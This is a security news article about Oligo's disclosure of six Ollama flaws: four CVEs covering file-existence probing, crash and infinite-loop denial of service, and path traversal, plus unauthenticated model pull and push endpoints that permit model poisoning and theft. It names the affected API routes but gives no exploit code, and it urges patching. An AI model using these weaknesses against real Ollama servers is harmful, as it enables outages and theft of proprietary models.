Six Vulnerabilities Uncovered in Ollama: Risks of AI Model Theft and Poisoning

Ollama vulnerability
10K unique internet-facing IPs that run Ollama | Image: Oligo

Oligo’s research team recently unveiled six vulnerabilities in Ollama, a popular open-source framework for running large language models (LLMs) on local and cloud infrastructure. As Ollama’s use in enterprise AI environments has surged, these vulnerabilities highlight significant risks for organizations deploying the tool.

Of the six vulnerabilities identified, four were officially assigned CVEs and patched in recent updates, while two were disputed by Ollama’s maintainers, classified as “shadow vulnerabilities.” As the report notes, “Collectively, the vulnerabilities could allow an attacker to carry out a wide-range of malicious actions with a single HTTP request, including Denial of Service (DoS) attacks, model poisoning, model theft, and more.”

  • CVE-2024-39719: Provides a primitive for file existence on the server, making it easier for threat actors to further abuse the application.
  • CVE-2024-39720 (Out-of-Bounds Read): This vulnerability can cause a Denial of Service by crashing the application when handling malformed model files. The flaw “enables attackers to crash the application through the CreateModel route, leading to a segmentation fault” due to improper memory handling
  • CVE-2024-39721 (Infinite Loop in CreateModel Route): A crafted API call could push the server into an infinite loop, exhausting CPU resources. According to Oligo, “calling the api/create endpoint multiple times with these parameters increases CPU usage… leading to denial of service.”
  • CVE-2024-39722 (Path Traversal): Through path traversal, attackers can gain insights into a server’s file structure, potentially exposing sensitive directories. The api/push route, used for model management, was flagged for reflecting file path errors that could be used to disclose server directory contents

Ollama’s model management endpoints—api/pull and api/push—pose serious security risks, as they lack sufficient authentication controls. This allows attackers to “pull a model from an unverified (HTTP) source” or “push a model to an unverified source,” making it possible to introduce malicious models into a server or exfiltrate private models without detection.

The report emphasizes that these issues “widen the attack surface” for organizations using Ollama, as attackers can exploit the model endpoints to corrupt models or steal proprietary intellectual property. By default, these endpoints remain open to external access, which could “lead to a denial of service (DoS)” when models are continuously downloaded, filling disk space.

With over 94,000 GitHub stars, Ollama’s popularity underscores the urgency for users to apply patches, configure security settings, and understand the implications of exposing AI model endpoints to the internet.

Related Posts: